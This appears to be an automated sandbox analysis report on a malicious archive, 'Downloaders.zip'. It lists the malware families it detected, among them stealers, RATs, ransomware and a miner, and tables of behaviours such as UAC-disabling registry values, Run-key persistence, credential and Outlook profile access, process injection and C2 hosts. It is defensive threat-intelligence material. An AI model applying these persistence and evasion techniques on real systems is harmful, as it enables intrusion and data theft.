Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
Gurcu, WhiteSnake
Redline family
Gurcu family
RMS
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
Amadey
Stealc
Remcos family
RedLine
Quasar RAT
Discord RAT
44Caliber family
Xworm
Quasar payload
Detect Umbral payload
Gh0st RAT payload
Remcos
Xworm family
Umbral family
Lumma Stealer, LummaC
xmrig
Quasar family
RedLine payload
Gh0strat family
Lockbit family
Umbral
Rule to detect Lockbit 3.0 ransomware Windows payload
Asyncrat family
AsyncRat
Detects Go variant of Hive Ransomware
Azorult
44Caliber
Xmrig family
Lockbit
Lumma family
UAC bypass
Amadey family
Detect Xworm Payload
Meduza
Rms family
Vidar family
Hive
Discordrat family
Meduza Stealer payload
Hive family
Vidar
Phorphiex family
Phorphiex payload
Meduza family
Phorphiex, Phorpiex
Gh0strat
Suspicious use of NtCreateProcessExOtherParentProcess
Detect Vidar Stealer
Azorult family
Detected Nirsoft tools
Enumerates VirtualBox registry keys
XMRig Miner payload
Async RAT payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Stops running service(s)
Uses browser remote debugging
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Adds policy Run key to start application
Modifies Windows Firewall
Command and Scripting Interpreter: PowerShell
Sets file to hidden
VMProtect packed file
A potential corporate email address has been identified in the URL: 3SCET_Admin@OFGADUSE_report.wsr
Reads data files stored by FTP clients
Checks computer location settings
Reads user/profile data of web browsers
Indicator Removal: Clear Windows Event Logs
Identifies Wine through registry keys
A potential corporate email address has been identified in the URL: oDRAV_Admin@OFGADUSE_report.wsr
A potential corporate email address has been identified in the URL: vtXV0_Admin@YQRLKYON_report.wsr
Checks BIOS information in registry
Loads dropped DLL
Clipboard Data
Drops startup file
Unsecured Credentials: Credentials In Files
A potential corporate email address has been identified in the URL: naAjO_Admin@OFGADUSE_report.wsr
Reads WinSCP keys stored on the system
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Power Settings
Indicator Removal: File Deletion
Enumerates connected drives
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Drops desktop.ini file(s)
Obfuscated Files or Information: Command Obfuscation
Network Service Discovery
Blocklisted process makes network request
Suspicious use of SetThreadContext
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates processes with tasklist
UPX packed file
AutoIT Executable
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
Event Triggered Execution: Installer Packages
Access Token Manipulation: Create Process with Token
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
Browser Information Discovery
Program crash
Detects Pyinstaller
Event Triggered Execution: Netsh Helper DLL
Uses Volume Shadow Copy service COM API
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
outlook_win_path
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies Internet Explorer settings
outlook_office_path
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Runs ping.exe
Modifies registry key
Gathers system information
Modifies registry class
Checks processor information in registry
Checks SCSI registry key(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Scheduled Task/Job: Scheduled Task
Delays execution with timeout.exe
Suspicious use of SendNotifyMessage
Kills process with taskkill
GoLang User-Agent
Runs .reg file with regedit
Suspicious behavior: MapViewOfSection
Detects videocard installed
Suspicious use of WriteProcessMemory
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-12 18:20
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-12 18:20
Reported
2024-12-12 18:25
Platform
win10v2004-20241007-en
Max time kernel
130s
Max time network
301s
Command Line
Signatures
Amadey
Amadey family
AsyncRat
Asyncrat family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Go variant of Hive Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gh0st RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gh0strat
Gh0strat family
Gurcu family
Gurcu, WhiteSnake
Hive
Hive family
Lockbit
Lockbit family
Lumma Stealer, LummaC
Lumma family
Meduza
Meduza Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Meduza family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Rule to detect Lockbit 3.0 ransomware Windows payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5596 created 3420 | N/A | C:\Users\Admin\AppData\Local\Temp\3161510603.exe | C:\Windows\Explorer.EXE |
| PID 5596 created 3420 | N/A | C:\Users\Admin\AppData\Local\Temp\3161510603.exe | C:\Windows\Explorer.EXE |
| PID 5760 created 3420 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 5760 created 3420 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 5760 created 3420 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 4312 created 3420 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\Explorer.EXE |
| PID 4312 created 3420 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\Explorer.EXE |
| PID 3272 created 2988 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe | C:\Windows\system32\sihost.exe |
| PID 4604 created 3420 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
Vidar
Vidar family
Xworm
Xworm family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
A potential corporate email address has been identified in the URL: vtXV0_Admin@YQRLKYON_report.wsr
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1989129625.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Roaming\\System.exe" | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
Checks installed software on the system
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe | N/A |
| File opened for modification | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1888 set thread context of 5684 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 4056 set thread context of 5856 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
| PID 5760 set thread context of 4312 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\conhost.exe |
| PID 5760 set thread context of 4108 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\dwm.exe |
| PID 3364 set thread context of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 8 set thread context of 4688 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\4434.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe | N/A |
| File created | C:\Windows\Tasks\defnur.job | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\ProgramData\javaw.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2309417675.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\281730318.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\fontdrvhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\steel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\4434.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\clip.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe | N/A |
